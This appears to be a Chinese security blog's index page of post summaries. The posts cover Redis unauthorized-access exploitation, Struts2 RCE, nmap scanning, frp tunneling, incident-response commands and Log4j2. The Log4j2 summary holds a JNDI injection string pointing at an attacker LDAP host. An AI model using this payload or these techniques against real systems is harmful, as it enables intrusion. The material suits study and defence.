whoam1

摘要： 网络通信过程 数据传递就像快递 数据就是物品，寄件人发件人是源目IP地址或者MAC地址，中间的交换机和路由器就像快递站。 网关的作用是对数据报文进行解封装，然后读取其目的信息，然后进行封装，根据目的信息把数据报文转发到可以到目的计算机所在网络的网关。 计算机A发出数据 数据到达网关 网关解封装、封装 阅读全文

摘要： 项目二总结 1.外网打点 1.1访问web页面，访问robots.txt页面 # # robots.txt # User-agent: * Disallow: /data Disallow: /hook Disallow: /public Disallow: /module Disallow: /t 阅读全文

摘要： Redia未授权访问利用 漏洞成因 未开启登录验证，并且把IP绑定到0.0.0.0 未开启登录验证，没有设置绑定IP，protected-mode关闭 利用 写SSH-keygen 原理 SSH提供两种登录验证方式，一种是口令验证也就是账号密码登录，另一种是密钥验证。 所谓密钥验证，其实就是一种基于 阅读全文

摘要： struts2原理特征 原理: 默认的content-type解析器会把用户传来的数据直接当成代码执行，造成rce 特征:ognl表达式，memberaccess字段，可以通过catalina日志过滤关键信息查找攻击特征 ongl表达式可以被当作代码执行，其中的类为defaultactionmapp 阅读全文

摘要： 渗透常用命令 nmap扫描 TARGET=10.10.11.183 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC 阅读全文

摘要： 应急响应常用命令 windows系统 查看资源占用情况 taskmgr 查看当前系统会话 query user 踢出用户登录 lusrmgr.msc 查看本地用户和组 lusrmgr.msc 查看本地管理员组是否存在非法用户 net localgroup administrators 使用Wmic查 阅读全文

摘要： 威胁情报分析 微步在线威胁情报社区： https://x.threatbook.cn/ VirusTotal： https://www.virustotal.com/#/home/search NSFOCUS： THREAT INTELLIGENCE https://221.122.179.15/ 阅读全文

摘要： 后台运行命令 win：start /b frpc.exe -c frpc.in linux：nohup ./frpc -c frpc.ini >/dev/null 2>&1 & 第一层 S端 [common] bind_port = 7000 C端 [common] tls_enable = tru 阅读全文

摘要：  阅读全文

摘要： Log4j2（CVE-2021-44228） 漏洞攻击原理 原理概述 当用户输入信息时，应用程序中的log4j2组件会将信息记录到日志中 假如日志中含有该语句${jndi:ldap:192.168.96.1:1099/exp}，log4j就会去解析该信息，通过jndi的lookup()方法去解析该U 阅读全文